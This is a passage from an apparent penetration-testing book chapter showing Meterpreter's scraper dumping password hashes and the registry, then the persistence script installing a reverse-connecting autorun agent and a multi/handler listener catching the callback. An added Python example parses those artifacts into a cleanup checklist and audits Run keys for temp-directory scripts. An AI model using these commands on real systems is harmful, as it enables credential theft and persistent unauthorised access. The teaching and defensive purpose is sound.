
Chapter 6

meterpreter > run scraper
[*] New session on 192.168.33.130:1095...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\XklepHOU.reg)

Using Persistence

Meterpreter's persistence script allows you to inject a Meterpreter agent to ensure that Meterpreter is running even after the target system reboots. If this is a reverse connection, you can set intervals for the target to connect back to the attacker machine. If it's a bind, you can have it attempt to bind on an interface at a given time.

WARNING 

If you use this functionality, be sure that you remove it after you’re done. If you forget to 
do this, any attacker can also gain access to the system without authentication!

In the following listing, we run persistence and tell Windows to autostart the agent at boot time (-X), wait 50 seconds (-i 50) before connection retries, run on port 443 (-p 443), and connect to IP 192.168.33.129. We then establish a listener for the agent at   with use multi/handler, and after setting a couple of options and running exploit, we see at   that the connection comes in as expected.

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.33.129
[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 onboot=true)
[*] Persistent agent script is 316384 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs
[*] Agent executed with PID 3160
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 2 opened (192.168.33.129:443 -> 192.168.33.130:1120)
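The WARNING above turns on knowing exactly what the persistence script left behind: a dropped script in the Windows TEMP directory, a running process, and a randomly named value under the HKLM Run key. The following Python is an added example, not code from the book or from Metasploit. It parses the script's own output (the lines shown in the listing, embedded here as a constructed sample) into a removal checklist, and then shows the defender's side of the same artifacts: an audit over a constructed list of Run-key entries that flags any entry launching a script from a temp directory. The function names, the benign sample entry, and the command line assumed for the xEYnaHedooc value are all assumptions; the page shows the key name and the dropped file path, not how the value invokes it.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the lines the persistence script printed in the listing above.
PERSISTENCE_OUTPUT = "\n".join([
    r"[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 onboot=true)",
    r"[*] Persistent agent script is 316384 bytes long",
    r"[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs",
    r"[*] Agent executed with PID 3160",
    r"[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc",
    r"[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc",
])

PARAMS_RE = re.compile(
    r"LHOST=(?P<lhost>\S+) LPORT=(?P<lport>\d+) \(interval=(?P<interval>\d+) onboot=(?P<onboot>\w+)\)")
AGENT_RE = re.compile(r"Uploaded the persistent agent to (?P<path>\S+)")
PID_RE = re.compile(r"Agent executed with PID (?P<pid>\d+)")
# Only the final "Installed" line is trusted; "Installing" is the attempt, not the result.
AUTORUN_RE = re.compile(r"Installed into autorun as (?P<key>HK[A-Z]+\\.*\\Run)\\(?P<name>\S+)")


def parse_persistence_output(text: str) -> Dict[str, object]:
    """Extract every artifact the persistence script reports creating."""
    info: Dict[str, object] = {}
    if (m := PARAMS_RE.search(text)):
        info.update(lhost=m["lhost"], lport=int(m["lport"]),
                    interval=int(m["interval"]), onboot=(m["onboot"] == "true"))
    if (m := AGENT_RE.search(text)):
        info["agent_path"] = m["path"]
    if (m := PID_RE.search(text)):
        info["pid"] = int(m["pid"])
    if (m := AUTORUN_RE.search(text)):
        info["autorun_key"] = m["key"]
        info["autorun_value"] = m["name"]
    return info


def cleanup_checklist(info: Dict[str, object]) -> List[str]:
    """Order matters: stop the process first, then remove the autorun, then the file."""
    steps = []
    if "pid" in info:
        steps.append(f"terminate agent process PID {info['pid']}")
    if "autorun_value" in info:
        steps.append(f"delete value {info['autorun_value']} under {info['autorun_key']}")
    if "agent_path" in info:
        steps.append(f"delete dropped script {info['agent_path']}")
    return steps


# Defender's view: the same artifacts as they appear in an autorun audit.
TEMP_DIRS = ("\\windows\\temp\\", "\\temp\\", "\\tmp\\", "\\appdata\\local\\temp\\")
SCRIPT_EXT = (".vbs", ".js", ".bat", ".cmd", ".ps1", ".hta")
# A quoted path, or an unquoted drive-letter path up to the next space.
PATH_RE = re.compile(r'"([^"]+)"|([a-zA-Z]:\\[^\s"]+)')

# Constructed Run-key entries: one benign, one modelled on the page's xEYnaHedooc value
# (the wscript.exe command line is an assumption, not shown on the page).
SAMPLE_AUTORUN: List[Tuple[str, str]] = [
    ("Updater", r'"C:\Program Files\Example\updater.exe" /background'),
    ("xEYnaHedooc", r"wscript.exe C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs"),
]


def audit_autorun(entries: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (value name, command, reason) for entries that run scripts from temp dirs."""
    findings = []
    for name, command in entries:
        reasons = []
        for quoted, bare in PATH_RE.findall(command):
            path = quoted or bare
            low = path.lower()
            if any(d in low for d in TEMP_DIRS):
                reasons.append(f"runs from a temp directory: {path}")
            if low.endswith(SCRIPT_EXT):
                reasons.append(f"launches a script file: {path}")
        if reasons:
            findings.append((name, command, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for step in cleanup_checklist(parse_persistence_output(PERSISTENCE_OUTPUT)):
        print("cleanup:", step)
    for name, command, reason in audit_autorun(SAMPLE_AUTORUN):
        print(f"suspicious autorun {name!r}: {reason}")
```

Run it with no arguments to print the three-step cleanup list for the listing above and the single flagged autorun entry. The audit deliberately keys on where the command runs from and what it launches rather than on the random-looking value name, since legitimate vendors also use opaque names; a real sweep would feed it the output of a registry export rather than the constructed list.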